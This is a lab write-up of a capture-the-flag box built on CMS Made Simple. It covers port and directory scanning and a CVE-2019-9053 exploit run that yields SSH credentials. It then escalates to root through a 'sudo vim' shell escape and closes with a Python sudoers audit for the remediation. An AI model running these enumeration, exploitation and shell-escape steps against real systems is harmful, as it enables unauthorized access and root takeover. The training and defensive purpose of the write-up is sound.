
[Linux] Simple CTF
Enumeration
sudo nmap 10.10.56.128

sudo nmap -A -p 21,80 10.10.56.128

HTTP
Robots.txt
First we look at the website. The nmap scan showed the presence of a robots.txt file. We should look at what is inside.

We get the following information:
web pages:
/openemr-5_0_1_3, /
name: mike
Neither web page can be accessed.
Directory listing
gobuster dir -u http://10.10.56.128 -w /usr/share/wordlists/dirb/common.txt


gobuster dir -u http://10.10.56.128/simple -w /usr/share/wordlists/dirb/common.txt

We see that the website is built on a CMS called CMS Made Simple.
FTP
We can't find anything interesting on the FTP server. The server enters passive mode when we try to list its resources. We don't try anything further.

Exploitation
CMS Made Simple is vulnerable to CVE-2019-9053. We use the following exploit to abuse the service: CVE-2019-9053.
python3 exploit.py -u http://10.10.56.128/simple/ -c -w /usr/share/dirb/wordlists/others/best110.txt

We got:
a username: mitch
an email: admin@admin.com
a password: secret
We get access to the admin administration page on the website.

SSH
We stayed at this stage until we did another enumeration phase on the remaining port (2222). Bingo! An SSH service runs on this port:
sudo nmap -A -p 2222 10.10.56.128

We can try the credentials on the SSH service.
ssh -p 2222 mitch@10.10.56.128

Privilege Escalation
sudo -l

We can explore GTFOBins to see how we can elevate our privileges on the system, as we are allowed to run the vim command as root.
sudo vim ~/user.txt
ESC (Escape key)
:!/bin/bash

Remediation
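The sudo rule that made the vim escape above possible can be found by auditing /etc/sudoers for programs that can spawn a child shell and are granted as root without the NOEXEC tag. The script below is an added example, not part of the original writeup; the sudoers content and the SHELL_SPAWNERS list are constructed for illustration.

```python
import re

# Constructed sudoers sample modelled on the "sudo -l" result in the writeup
# (mitch may run vim as root); the other lines are hypothetical.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
mitch   ALL=(root) NOPASSWD: /usr/bin/vim
deploy  ALL=(root) NOEXEC: /usr/bin/vim
backup  ALL=(root) /usr/bin/rsync
"""

# Short, assumed list of interactive programs that can start a shell when run.
# A real audit would use a fuller list (e.g. from GTFOBins).
SHELL_SPAWNERS = {"vim", "vi", "nano", "less", "more", "man"}

# user  host=(runas[:group]) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudoers(text):
    """Return (user, program) pairs for rules that let a user run a
    shell-spawning program as root without the NOEXEC tag."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("Defaults", "#")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0]
        if runas_user not in ("root", "ALL"):
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            prog = cmd.strip().split()[0]
            if prog.rsplit("/", 1)[-1] in SHELL_SPAWNERS and "NOEXEC" not in tags:
                findings.append((m.group("user"), prog))
    return findings


if __name__ == "__main__":
    for user, prog in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: {prog} as root without NOEXEC; add NOEXEC or use sudoedit")
```

NOEXEC stops the editor from executing child processes, and sudoedit lets a user edit a file as root without ever running the editor itself with root privileges.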